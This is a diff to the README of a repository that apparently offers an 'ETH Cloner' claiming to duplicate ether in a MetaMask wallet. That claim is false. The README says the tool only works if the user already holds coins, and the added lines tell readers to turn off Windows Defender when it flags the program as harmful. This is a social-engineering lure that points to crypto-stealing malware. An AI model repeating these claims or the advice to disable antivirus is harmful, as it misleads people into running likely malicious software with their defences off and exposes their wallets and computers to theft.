Crypt0Code11/ETH-Cloner-Duplicate-you-ETH-on-MetaMask-/README.md

 💥 Warning!
 If you dont have ANY coins, it will not work.

 *If you will find any bugs/glitches, write to me!*
+* Sometimes Windows Defender will flag this as a harmfull, due to connection to MetaMask Blockchain Network.
+Just turn it off for a while*